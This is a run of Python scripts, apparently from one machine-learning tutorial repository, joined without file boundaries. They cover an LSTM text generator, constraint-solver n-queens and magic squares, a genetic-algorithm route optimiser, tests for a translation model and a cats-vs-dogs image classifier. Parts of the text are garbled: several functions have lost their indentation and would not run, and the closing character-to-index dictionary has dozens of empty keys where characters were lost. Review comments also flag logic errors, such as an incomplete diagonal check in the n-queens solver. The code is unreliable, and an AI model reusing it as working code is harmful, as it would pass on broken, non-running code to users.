        X[i, t, char2int[char]] = 1
    y[i, char2int[y_train[i]]] = 1
print("X.shape:", X.shape)
# building the model
# model = Sequential([
#     LSTM(128, input_shape=(sequence_length, n_unique_chars)),
#     Dense(n_unique_chars, activation="softmax"),
# ])
# a better model (slower to train obviously)
model = Sequential([
    LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
    Dropout(0.3),
    LSTM(256),
    Dense(n_unique_chars, activation="softmax"),
])
# model.load_weights("results/wonderland-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
    os.mkdir("results")
# checkpoint saves weights after every epoch, named by the training loss
checkpoint = ModelCheckpoint("results/wonderland-v2-{loss:.2f}.h5", verbose=1)
# train the model
model.fit(X, y, batch_size=BATCH_SIZE, epochs=EPOCHS, callbacks=[checkpoint])
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
    """Solve the n-queens problem as a CSP and return all solutions.

    Variables x0..x{n-1} represent columns; values 1..n are row positions.
    """
    def not_in_diagonal(a, b):
        # NOTE(review): this only rejects a == b + i (one diagonal direction),
        # and below it is applied only to adjacent pairs drawn from an
        # unordered set — confirm it actually covers both diagonals
        result = True
        for i in range(1, n):
            result = result and ( a != b + i )
        return result
    problem = Problem()
    variables = { f'x{i}' for i in range(n) }
    problem.addVariables(variables, Domain(set(range(1, n+1))))
    # all queens must sit on distinct rows
    problem.addConstraint(AllDifferentConstraint())
    for pair in _get_pairs(variables):
        problem.addConstraint(not_in_diagonal, pair)
    return problem.getSolutions()
def magic_square(n=3):
    """Search for n x n magic squares via constraint solving (slow for n > 3)."""
    def all_equal(*variables):
        # reshape the flat assignment into a square and require every row and
        # column sum to equal the main-diagonal sum
        square = np.reshape(variables, (n, n))
        diagonal = sum(np.diagonal(square))
        b = True
        for i in range(n):
            b = b and sum(square[i, :]) == diagonal
            b = b and sum(square[:, i]) == diagonal
        if b:
            print(square)
        return b
    problem = Problem()
    variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
    # NOTE(review): this domain is 1..n**2+1; a classic magic square uses
    # exactly 1..n**2 — confirm the extra value is intended
    problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
    problem.addConstraint(all_equal, variables)
    problem.addConstraint(AllDifferentConstraint())
    return problem.getSolutions()
def plot_queens(solutions):
    """Scatter-plot each n-queens solution: variable index on x, row value on y."""
    for solution in solutions:
        for row, column in solution.items():
            # variable names look like 'x3' — strip the prefix to get the index
            x = int(row.lstrip('x'))
            y = column
            plt.scatter(x, y, s=70)
        plt.grid()
        plt.show()
if __name__ == "__main__":
    # solutions = n_queens(n=12)
    # print(solutions)
    # plot_queens(solutions)
    # print every magic square found for a 4x4 grid
    solutions = magic_square(n=4)
    for solution in solutions:
        print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
# signals the background animation thread to stop redrawing
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
    """Plot the initial and final GA routes side by side for comparison.

    :param initial_route: list of City objects before optimization
    :param final_route: list of City objects after optimization
    """
    _, ax = plt.subplots(nrows=1, ncols=2)
    for col, (title, route) in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route)]):
        col.title.set_text(title)
        # draw the cities and the open path through them
        for city in route:
            col.scatter(city.x, city.y, s=70, c='b')
        col.plot([city.x for city in route], [city.y for city in route], c='r')
        # close the tour: segment from the last city back to the first
        # (the original passed [x_last, y_last] as the y-coordinates — a bug)
        col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
    plt.show()
def animate_progress():
    """Start a background thread that live-plots the current best route and the
    distance-per-generation curve until the stop_animation event is set.

    Reads the module-level globals `route` and `progress` that
    genetic_algorithm() keeps updated.
    """
    global route
    global progress
    global stop_animation
    def animate():
        # figure = plt.figure()
        # ax1 = figure.add_subplot(1, 1, 1)
        figure, ax1 = plt.subplots(nrows=1, ncols=2)
        while True:
            # redraw both panels from scratch each tick
            ax1[0].clear()
            ax1[1].clear()
            # current routes and cities
            ax1[0].title.set_text("Current routes")
            for city in route:
                ax1[0].scatter(city.x, city.y, s=70, c='b')
            ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
            # closing segment back to the first city
            ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
            # current distance graph
            ax1[1].title.set_text("Current distance")
            ax1[1].plot(progress)
            ax1[1].set_ylabel("Distance")
            ax1[1].set_xlabel("Generation")
            # brief pause lets matplotlib process GUI events
            plt.pause(0.05)
            if stop_animation.is_set():
                break
        plt.show()
    Thread(target=animate).start()
class City:
    """A 2-D point on the map; `a - b` yields the Euclidean distance a→b."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def distance(self, city):
        """Return the Euclidean distance between this city and *city*."""
        dx = self.x - city.x
        dy = self.y - city.y
        return np.sqrt(dx ** 2 + dy ** 2)

    def __sub__(self, city):
        # subtraction reads as "distance between the two cities"
        return self.distance(city)

    def __repr__(self):
        return f"({self.x}, {self.y})"

    def __str__(self):
        return self.__repr__()
class Fitness:
    """Scores a route: fitness is the inverse of its total cyclic distance."""
    def __init__(self, route):
        self.route = route
    def distance(self):
        """Total distance of the closed tour (last leg returns to the start).

        The original wrap-around test used `i+i < len(...)`, which wrongly
        wrapped to the first city for every index past the midpoint; the
        correct condition is `i+1 < len(...)`.
        """
        distance = 0
        for i in range(len(self.route)):
            from_city = self.route[i]
            # step to the next city, wrapping to the start on the last leg
            to_city = self.route[i+1] if i+1 < len(self.route) else self.route[0]
            distance += (from_city - to_city)
        return distance
    def fitness(self):
        """Inverse distance — larger is better (assumes a non-zero tour length)."""
        return 1 / self.distance()
def generate_cities(size):
    """Generate *size* random cities biased toward the border of the 200x200 map.

    Points that land in the central band are pushed to the margins so routes
    form a rough ring.
    """
    cities = []
    for i in range(size):
        x = random.randint(0, 200)
        y = random.randint(0, 200)
        if 40 < x < 160:
            # x is central: force y to the top or bottom margin
            if 0.5 <= random.random():
                y = random.randint(0, 40)
            else:
                y = random.randint(160, 200)
        elif 40 < y < 160:
            # y is central: force x to the left or right margin
            if 0.5 <= random.random():
                x = random.randint(0, 40)
            else:
                x = random.randint(160, 200)
        cities.append(City(x, y))
    return cities
    # return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
    """Return a random permutation of *cities* as a fresh list."""
    return random.sample(cities, k=len(cities))
def initial_population(popsize, cities):
    """Build *popsize* independent random routes over *cities*."""
    return [create_route(cities) for _ in range(popsize)]
def sort_routes(population):
    """Score every route and return (index, fitness) pairs, best fitness first."""
    scored = [(idx, Fitness(candidate).fitness()) for idx, candidate in enumerate(population)]
    # highest fitness (shortest distance) first
    scored.sort(key=lambda pair: pair[1], reverse=True)
    return scored
def selection(population, elite_size):
    """Pick routes for breeding: keep the top *elite_size* routes, then fill
    the remainder by fitness-proportionate (roulette-wheel) selection."""
    sorted_pop = sort_routes(population)
    df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
    # calculates the cumulative sum
    # example:
    # [5, 6, 7] => [5, 11, 18]
    df['cum_sum'] = df['Fitness'].cumsum()
    # calculates the cumulative percentage
    # example:
    # [5, 6, 7] => [5/18, 11/18, 18/18]
    # [5, 6, 7] => [27.77%, 61.11%, 100%]
    df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
    # elites pass through unconditionally
    result = [ sorted_pop[i][0] for i in range(elite_size) ]
    # NOTE(review): the inner loop reuses the name `i`, shadowing the outer
    # counter — harmless here but easy to misread
    for i in range(len(sorted_pop) - elite_size):
        pick = random.random() * 100
        for i in range(len(sorted_pop)):
            if pick <= df['cum_perc'][i]:
                result.append(sorted_pop[i][0])
                break
    return [ population[index] for index in result ]
def breed(parent1, parent2):
    """Ordered crossover: copy a random slice of parent1, fill the rest from parent2."""
    cut_a = random.randint(0, len(parent1))
    cut_b = random.randint(0, len(parent2))
    lo, hi = min(cut_a, cut_b), max(cut_a, cut_b)
    # genes inherited as a contiguous slice of the first parent
    segment = list(parent1[lo:hi])
    # remaining genes keep their relative order from the second parent
    filler = [gene for gene in parent2 if gene not in segment]
    return segment + filler
def breed_population(selection, elite_size):
    """Carry the elite through unchanged and breed the rest from a shuffled pool."""
    pool = random.sample(selection, len(selection))
    # elites survive as-is
    offspring = list(selection[:elite_size])
    # the remainder are crossovers of pool members paired front-to-back
    n_breed = len(selection) - elite_size
    for i in range(n_breed):
        offspring.append(breed(pool[i], pool[len(selection) - i - 1]))
    return offspring
def mutate(route, mutation_rate):
    """Swap-mutate *route* in place: each position has *mutation_rate* chance
    of being exchanged with a random position; returns the same list."""
    size = len(route)
    for idx in range(size):
        # independent swap chance per position
        if random.random() < mutation_rate:
            partner = random.randint(0, size - 1)
            route[idx], route[partner] = route[partner], route[idx]
    return route
def mutate_population(population, mutation_rate):
    """Apply mutate() to every route in *population*."""
    mutated = []
    for individual in population:
        mutated.append(mutate(individual, mutation_rate))
    return mutated
def next_gen(current_gen, elite_size, mutation_rate):
    """Advance one generation: select parents, breed offspring, then mutate."""
    parents = selection(population=current_gen, elite_size=elite_size)
    offspring = breed_population(selection=parents, elite_size=elite_size)
    return mutate_population(offspring, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
    """Run the GA over *cities*; returns (initial_route, final_route, distance).

    :param popsize: number of routes per generation
    :param elite_size: routes carried over unchanged each generation
    :param mutation_rate: per-position swap probability
    :param plot: live-plot progress in a background thread
    :param prn: print progress to stdout
    """
    # the animation thread reads these two globals while we evolve
    global route
    global progress
    population = initial_population(popsize=popsize, cities=cities)
    if plot:
        animate_progress()
    sorted_pop = sort_routes(population)
    initial_route = population[sorted_pop[0][0]]
    # fitness is 1/distance, so invert it back to a distance
    distance = 1 / sorted_pop[0][1]
    if prn:
        print(f"Initial distance: {distance}")
    try:
        if plot:
            progress = [ distance ]
            for i in range(generations):
                population = next_gen(population, elite_size, mutation_rate)
                sorted_pop = sort_routes(population)
                distance = 1 / sorted_pop[0][1]
                progress.append(distance)
                if prn:
                    print(f"[Generation:{i}] Current distance: {distance}")
                route = population[sorted_pop[0][0]]
        else:
            for i in range(generations):
                population = next_gen(population, elite_size, mutation_rate)
                distance = 1 / sort_routes(population)[0][1]
                if prn:
                    print(f"[Generation:{i}] Current distance: {distance}")
    except KeyboardInterrupt:
        # let the user stop early; fall through and report the best found so far
        pass
    stop_animation.set()
    final_route_index = sort_routes(population)[0][0]
    final_route = population[final_route_index]
    if prn:
        print("Final route:", final_route)
    return initial_route, final_route, distance
if __name__ == "__main__":
    # demo run: 25 random cities with hand-tuned hyperparameters
    cities = generate_cities(25)
    initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
    # plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
    """
    brief Convert a Matplotlib figure to a PIL Image in RGB format and return it
    param fig a matplotlib figure
    return a Python Imaging Library ( PIL ) image
    """
    # put the figure pixmap into a numpy array
    buf = fig2data ( fig )
    w, h, d = buf.shape
    # ndarray.tostring() was removed from NumPy; tobytes() is the supported,
    # byte-identical replacement
    return Image.frombytes( "RGB", ( w ,h ), buf.tobytes( ) )
def fig2data ( fig ):
    """
    brief Convert a Matplotlib figure to a numpy array with RGB channels and return it
    param fig a matplotlib figure
    return a numpy 3D array of RGB values
    """
    # draw the renderer
    fig.canvas.draw ( )
    # Get the RGB buffer from the figure.
    # numpy.fromstring is deprecated/removed for binary input; frombuffer is the
    # supported equivalent (copied so the result is writable).
    w,h = fig.canvas.get_width_height()
    buf = numpy.frombuffer ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 ).copy()
    # NOTE(review): a row-major RGB buffer holds h*w*3 bytes, so (w, h, 3) only
    # matches for square figures — fig2img compensates by passing (w, h) to PIL,
    # so confirm both sides before changing either.
    buf.shape = ( w, h,3 )
    # rolling a length-3 axis by 3 is a no-op, kept from the original ARGB variant
    buf = numpy.roll ( buf, 3, axis = 2 )
    return buf
if __name__ == "__main__":
    # demo code kept below for reference (commented out)
    pass
# figure = plt.figure()
# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
    """Render *route* to a matplotlib figure and display it in an OpenCV window."""
    figure = plt.figure(figsize=(14, 8))
    plt.title("Real time routes")
    for city in route:
        plt.scatter(city.x, city.y, s=70, c='b')
    plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
    # rasterize the figure so OpenCV can show it as a frame
    img = numpy.array(fig2img(figure))
    cv2.imshow("test", img)
    if cv2.waitKey(1) == ord('q'):
        cv2.destroyAllWindows()
    # free the figure to avoid leaking memory across calls
    plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
    """Return the fixed 26-city benchmark tour used for hyperparameter tuning."""
    coords = [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)]
    return [City(x, y) for (x, y) in coords]
def train():
    """Grid-search GA hyperparameters on the fixed city set and report the
    combination (popsize, elite_size, mutation_rate) with the lowest final
    tour distance."""
    cities = load_cities()
    generations = 1000
    popsizes = [60, 100, 140, 180]
    elitesizes = [5, 15, 25, 35, 45]
    mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
    total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
    iteration = 0
    tries = {}
    for popsize in popsizes:
        for elite_size in elitesizes:
            for mutation_rate in mutation_rates:
                iteration += 1
                init_route, final_route, distance = genetic_algorithm(cities=cities,
                                                                      popsize=popsize,
                                                                      elite_size=elite_size,
                                                                      mutation_rate=mutation_rate,
                                                                      generations=generations,
                                                                      plot=False,
                                                                      prn=False)
                progress = iteration / total_iterations
                percentage = progress * 100
                print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
                tries[(popsize, elite_size, mutation_rate)] = distance
    # BUG FIX: the original inverted the dict ({distance: params}), which
    # silently drops parameter sets that tie on distance; take the argmin
    # over the keys directly instead.
    best_combination = min(tries, key=tries.get)
    print("Best combination:", best_combination)
if __name__ == "__main__":
    train()
# Best parameter combinations observed in earlier grid searches:
# popsize  elitesize  mutation_rate
# 90       25         0.0001
# 110      10         0.001
# 130      10         0.005
# 130      20         0.001
# 150      25         0.001
import os
def load_data(path):
    """Load a text dataset and return it as a list of lines.

    path: path to the text file.
    return: list[str] -- file contents split on '\n' (a trailing newline
    yields a final empty string, as before).
    """
    # os.path.join() with a single argument was a no-op; open directly.
    with open(path, "r") as f:
        data = f.read()
    return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
    """Shared sanity checks: input/output shapes and loss configuration."""
    # Unwrap Sequential so we inspect the underlying functional model.
    if isinstance(model, Sequential):
        model = model.model
    expected_in = (None, *input_shape[1:])
    assert model.input_shape == expected_in, \
        'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
    expected_out = (None, output_sequence_length, french_vocab_size)
    assert model.output_shape == expected_out, \
        'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
        .format(model.output_shape, output_sequence_length, french_vocab_size)
    assert len(model.loss_functions) > 0, \
        'No loss function set. Apply the compile function to the model.'
    assert sparse_categorical_crossentropy in model.loss_functions, \
        'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
    """Build the simple RNN model and run the shared shape/loss checks."""
    shape_in, seq_len = (137861, 21, 1), 21
    en_vocab, fr_vocab = 199, 344
    built = simple_model(shape_in, seq_len, en_vocab, fr_vocab)
    _test_model(built, shape_in, seq_len, fr_vocab)
def test_embed_model(embed_model):
    """Build the embedding model and run the shared shape/loss checks."""
    shape_in, seq_len = (137861, 21), 21
    en_vocab, fr_vocab = 199, 344
    built = embed_model(shape_in, seq_len, en_vocab, fr_vocab)
    _test_model(built, shape_in, seq_len, fr_vocab)
def test_encdec_model(encdec_model):
    """Build the encoder-decoder model and run the shared shape/loss checks."""
    shape_in, seq_len = (137861, 15, 1), 21
    en_vocab, fr_vocab = 199, 344
    built = encdec_model(shape_in, seq_len, en_vocab, fr_vocab)
    _test_model(built, shape_in, seq_len, fr_vocab)
def test_bd_model(bd_model):
    """Build the bidirectional model and run the shared shape/loss checks."""
    shape_in, seq_len = (137861, 21, 1), 21
    en_vocab, fr_vocab = 199, 344
    built = bd_model(shape_in, seq_len, en_vocab, fr_vocab)
    _test_model(built, shape_in, seq_len, fr_vocab)
def test_model_final(model_final):
    """Build the final combined model and run the shared shape/loss checks."""
    shape_in, seq_len = (137861, 15), 21
    en_vocab, fr_vocab = 199, 344
    built = model_final(shape_in, seq_len, en_vocab, fr_vocab)
    _test_model(built, shape_in, seq_len, fr_vocab)
# Class labels; the index in this list is the numeric label used everywhere.
CATEGORIES = ["Dog", "Cat"]
# Images are resized to IMG_SIZE x IMG_SIZE grayscale before training.
IMG_SIZE = 100
# Raw Kaggle dump and the train/test split directories (machine-specific).
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
# Name (without extension) of the trained Keras model to evaluate below.
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
    """Read an image as grayscale and resize it to IMG_SIZE x IMG_SIZE.

    path: path to an image file.
    return: 2D uint8 numpy array of shape (IMG_SIZE, IMG_SIZE).
    raises FileNotFoundError: if the file is missing or unreadable.
    """
    image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    # cv2.imread signals failure by returning None instead of raising;
    # fail loudly here rather than with a cryptic error inside resize().
    if image is None:
        raise FileNotFoundError(f"Could not read image: {path}")
    return cv2.resize(image, (IMG_SIZE, IMG_SIZE))
def load_model():
    """Load and return the trained Keras model named by the MODEL constant."""
    model_path = f"{MODEL}.model"
    return tf.keras.models.load_model(model_path)
def predict(img):
    """Classify one image file and return the predicted label index.

    img: path to an image file (forwarded to prepare_image).
    Relies on a module-level `model` existing before the call (it is
    created in the __main__ block below) -- NOTE(review): implicit global.
    NOTE(review): int() truncates the sigmoid output, so any value below
    1.0 maps to 0 -- presumably rounding/thresholding was intended; verify.
    """
    prediction = model.predict([prepare_image(img)])[0][0]
    return int(prediction)
if __name__ == "__main__":
    # Evaluate the saved model on the held-out testing split.
    model = load_model()
    x_test, y_test = [], []
    for code, category in enumerate(CATEGORIES):
        path = os.path.join(TESTING_DIR, category)
        for img in tqdm(os.listdir(path), "Loading images:"):
            # result = predict(os.path.join(path, img))
            # if result == code:
            #     correct += 1
            # total += 1
            # testing_data.append((os.path.join(path, img), code))
            x_test.append(prepare_image(os.path.join(path, img)))
            y_test.append(code)
    # Shape the grayscale images into the (N, H, W, 1) tensor Keras expects.
    x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
    # random.shuffle(testing_data)
    # total = 0
    # correct = 0
    # for img, code in testing_data:
    #     result = predict(img)
    #     if result == code:
    #         correct += 1
    #     total += 1
    # accuracy = (correct/total) * 100
    # print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
    # print(x_test)
    # print("="*50)
    # print(y_test)
    print(model.evaluate([x_test], y_test))
    print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
    """Load grayscale images under path/<category> and pair each with the
    index of its category in CATEGORIES.

    Returns a list of (image, label) tuples.
    """
    samples = []
    for label, category in enumerate(CATEGORIES):
        category_dir = os.path.join(path, category)
        for filename in tqdm(os.listdir(category_dir), desc=f"Loading {category} data: "):
            full_path = os.path.join(category_dir, filename)
            image = cv2.imread(full_path, cv2.IMREAD_GRAYSCALE)
            samples.append((image, label))
    return samples
def load_training_data():
    """Load (image, label) pairs from the training split directory."""
    return load_data(TRAINING_DIR)
def load_testing_data():
    """Load (image, label) pairs from the testing split directory."""
    return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
    """Load the pickled (X, y) training data from the current directory.

    return: (X, y) where X is the feature array wrapped in np.array and y
    is whatever was pickled (a list of labels).
    """
    # FIX: the original left both file handles open; context managers
    # guarantee they are closed even if unpickling raises.
    with open("X.pickle", 'rb') as fx:
        X = np.array(pickle.load(fx))
    with open("y.pickle", 'rb') as fy:
        y = pickle.load(fy)
    return X, y
print("Loading data...")
X, y = load()
# Scale pixel intensities from [0, 255] down into [0, 1] for training.
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
# ModelCheckpoint substitutes {val_acc:.2f} from the epoch logs, so the
# best checkpoint carries its validation accuracy in its filename.
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# Four conv stages (32/64/96/128 filters) with dropout + max pooling.
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# NOTE(review): Dense before Flatten applies the layer per spatial position;
# usually Flatten comes first -- confirm this ordering is intended.
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
              optimizer="rmsprop",
              metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256         # Sequences per batch
num_steps = 70           # Number of sequence steps per batch
lstm_size = 256          # Size of hidden layers in LSTMs
num_layers = 2           # Number of LSTM layers
learning_rate = 0.003    # Learning rate
keep_prob = 0.3          # Dropout keep probability
epochs = 20
# Print losses every N iterations
print_every_n = 100
# Save a checkpoint every N iterations
save_every_n = 500
# CPU threads handed to TensorFlow's intra-op parallelism below.
NUM_THREADS = 12
# Force CPU-only execution: hide all CUDA devices before TensorFlow loads.
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# Session config pinning TensorFlow to a single CPU device and no GPUs.
config = tf.ConfigProto(intra_op_parallelism_threads=1,
                        inter_op_parallelism_threads=1,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
